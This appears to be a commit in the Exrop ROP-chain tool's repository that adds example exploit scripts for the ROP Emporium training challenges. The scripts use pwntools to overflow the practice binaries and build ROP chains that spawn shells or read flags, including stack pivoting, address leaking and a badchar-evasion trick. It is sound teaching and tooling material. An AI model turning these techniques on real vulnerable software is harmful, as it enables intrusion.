add rop emporium example

d4em0n · Feb 6, 2020 · dc3737b · dc3737b
1 parent 626675e
commit dc3737b
Show file tree

Hide file tree

Showing 22 changed files with 134 additions and 0 deletions.
diff --git a/examples/rop_emporium/badchars/badchars b/examples/rop_emporium/badchars/badchars
diff --git a/examples/rop_emporium/badchars/exploit.py b/examples/rop_emporium/badchars/exploit.py
@@ -0,0 +1,17 @@
+from Exrop import Exrop
+from pwn import *
+
+binname = "./badchars"
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+elf = ELF("./badchars", checksec=False)
+system = elf.symbols['system']
+print("system @ {:08x}".format(system))
+chain = rop.func_call(system, ("head${IFS}?lag.txt", 0), elf.bss()) # hack to avoid badchar
+#chain.dump()
+buf  = b"A"*40
+payload = buf + chain.payload_str()
+p = process("./badchars")
+p.recv(1024)
+p.sendline(payload)
+p.interactive()
diff --git a/examples/rop_emporium/badchars/flag.txt b/examples/rop_emporium/badchars/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/callme/callme b/examples/rop_emporium/callme/callme
diff --git a/examples/rop_emporium/callme/encrypted_flag.txt b/examples/rop_emporium/callme/encrypted_flag.txt
@@ -0,0 +1 @@
+SMSA~gXxekhieactt`L''tnl|E}p|y>]!
diff --git a/examples/rop_emporium/callme/exploit.py b/examples/rop_emporium/callme/exploit.py
@@ -0,0 +1,22 @@
+from pwn import *
+from Exrop import Exrop
+
+binname = "./callme"
+p = process(binname)
+elf = ELF(binname)
+callme_one = elf.symbols['callme_one']
+callme_two = elf.symbols['callme_two']
+callme_three = elf.symbols['callme_three']
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+chain1 = rop.func_call(callme_one, (1,2,3))
+chain1.dump()
+chain2 = rop.func_call(callme_two, (1,2,3))
+chain2.dump()
+chain3 = rop.func_call(callme_three, (1,2,3))
+chain3.dump()
+buf = b"A"*0x28
+rop = chain1.payload_str() + chain2.payload_str() + chain3.payload_str()
+pay = buf + rop
+p.sendlineafter("> ", pay)
+p.interactive()
diff --git a/examples/rop_emporium/callme/key1.dat b/examples/rop_emporium/callme/key1.dat
@@ -0,0 +1,2 @@
+	
+

diff --git a/examples/rop_emporium/callme/key2.dat b/examples/rop_emporium/callme/key2.dat
@@ -0,0 +1 @@
+ 
diff --git a/examples/rop_emporium/callme/libcallme.so b/examples/rop_emporium/callme/libcallme.so
diff --git a/examples/rop_emporium/fluff/exploit.py b/examples/rop_emporium/fluff/exploit.py
@@ -0,0 +1,16 @@
+from Exrop import Exrop
+from pwn import *
+
+binname = "fluff"
+rop = Exrop(binname)
+rop.find_gadgets(cache=True, add_opt="--depth 15")
+elf = ELF(binname, checksec=False)
+bss = elf.bss()
+system = elf.symbols['system']
+chain = rop.func_call(system, ("/bin/sh",), elf.bss())
+chain.dump()
+buf = b"A"*40
+buf += chain.payload_str()
+p = process("./fluff")
+p.sendlineafter("> ", buf)
+p.interactive()
diff --git a/examples/rop_emporium/fluff/flag.txt b/examples/rop_emporium/fluff/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/fluff/fluff b/examples/rop_emporium/fluff/fluff
diff --git a/examples/rop_emporium/pivot/exploit.py b/examples/rop_emporium/pivot/exploit.py
@@ -0,0 +1,37 @@
+from Exrop import Exrop
+from pwn import *
+
+context.terminal = "tmux splitw -h -f".split()
+binname = "pivot"
+p = process(binname)
+rop = Exrop(binname)
+elf = ELF(binname, checksec=False)
+libpivot = ELF("./libpivot.so", checksec=False)
+buf = b"A"*0x28
+ret = 0x00000000004007c9 # for padding
+
+rop.find_gadgets(cache=True)
+puts = elf.symbols['puts']
+footholdgot = elf.got['foothold_function']
+foothold = elf.symbols['foothold_function']
+main = elf.symbols['main']
+
+p.recvuntil(": ")
+pivot_addr = int(p.recvuntil("\n", drop=True), 16)
+
+pivot_chain = rop.stack_pivot(pivot_addr, avoid_char=b"\x0a")
+pivot_chain.dump()
+chain2 = rop.func_call(puts, (footholdgot,))
+chain2.dump()
+pay = buf + pivot_chain.payload_str()
+
+rop = p64(foothold) + chain2.payload_str() + p64(main)
+p.sendlineafter("> ", rop)
+p.sendlineafter("> ", pay)
+p.recvuntil("libpivot.so")
+leak = u64(p.recvuntil("\n", drop=True).ljust(8, b"\x00"))
+libpivot.address = leak - libpivot.symbols['foothold_function']
+ret2win = libpivot.symbols['ret2win']
+print(hex(libpivot.address))
+p.sendlineafter("> ", buf + p64(ret) + p64(ret2win))
+p.interactive()
diff --git a/examples/rop_emporium/pivot/flag.txt b/examples/rop_emporium/pivot/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/pivot/libpivot.so b/examples/rop_emporium/pivot/libpivot.so
diff --git a/examples/rop_emporium/pivot/pivot b/examples/rop_emporium/pivot/pivot
diff --git a/examples/rop_emporium/split/exploit.py b/examples/rop_emporium/split/exploit.py
@@ -0,0 +1,16 @@
+from pwn import *
+from Exrop import Exrop
+
+binname = "./split"
+p = process(binname)
+elf = ELF(binname)
+catflag = next(elf.search(b"/bin/cat flag.txt"))
+system = elf.symbols['system']
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+chain = rop.func_call(system, (catflag, 0))
+chain.dump()
+buf = b"A"*0x28
+pay = buf + chain.payload_str()
+p.sendlineafter("> ", pay)
+p.interactive()
diff --git a/examples/rop_emporium/split/flag.txt b/examples/rop_emporium/split/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/split/split b/examples/rop_emporium/split/split
diff --git a/examples/rop_emporium/write4/exploit.py b/examples/rop_emporium/write4/exploit.py
@@ -0,0 +1,17 @@
+from Exrop import Exrop
+from pwn import *
+
+binname = "write4"
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+elf = ELF(binname, checksec=False)
+bss = elf.bss()
+system = elf.symbols['system']
+chain = rop.func_call(system, ("/bin/sh",), elf.bss())
+chain.dump()
+ret = p64(0x0000000000400806) # for padding
+buf = b"A"*40
+buf += ret + chain.payload_str() # ret for padding
+p = process(binname)
+p.sendlineafter("> ", buf)
+p.interactive()
diff --git a/examples/rop_emporium/write4/flag.txt b/examples/rop_emporium/write4/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/write4/write4 b/examples/rop_emporium/write4/write4